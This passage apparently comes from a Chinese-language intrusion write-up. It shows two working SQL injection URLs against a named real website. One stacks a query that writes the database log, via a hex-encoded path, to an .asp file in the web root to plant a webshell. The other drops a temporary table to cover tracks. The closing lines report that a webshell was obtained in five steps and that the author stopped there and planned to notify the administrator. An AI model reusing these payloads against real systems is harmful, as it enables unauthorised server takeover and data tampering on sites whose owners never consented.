aspx?ebookdate=2005-11-29’;declare/**/@a/**/sysname,@s/**/nvarchar(4000)/**/select/**/@a=db_name(),@s=0x44003a005c006c007800770079005c004e00650077005c0077006500620073006900740065005c00300030003000300031005c003000300030003000310030003000300036005c0030003000300030003100300030003000360030003000300032005c00300030003000300031003000300030003600300030003000320030003000300032005c0031002e006100730070005C007A007A002E00610073007000/**/backup/**/log/**/@a/**/to/**/disk=@s/**/with/**/init,no_truncate">http://www.infosec365.com.cn/ViewEbook.aspx?ebookdate=2005-11-29’;declare/**/@a/**/sysname,@s/**/nvarchar(4000)/**/select/**/@a=db_name(),@s=0x44003a005c006c007800770079005c004e00650077005c0077006500620073006900740065005c00300030003000300031005c003000300030003000310030003000300036005c0030003000300030003100300030003000360030003000300032005c00300030003000300031003000300030003600300030003000320030003000300032005c0031002e006100730070005C007A007A002E00610073007000/**/backup/**/log/**/@a/**/to/**/disk=@s/**/with/**/init,no_truncate--
http://www.infosec365.com.cn/ViewEbook.aspx?ebookdate=2005-11-29’;Drop/**/table/**/[shit_tmp]--
这5步下来我们就成功拿到webshell了
因为我是在公司上的
为了不连累公司
我就不做下一步入侵了
给管理员发个信提示一下就能够了
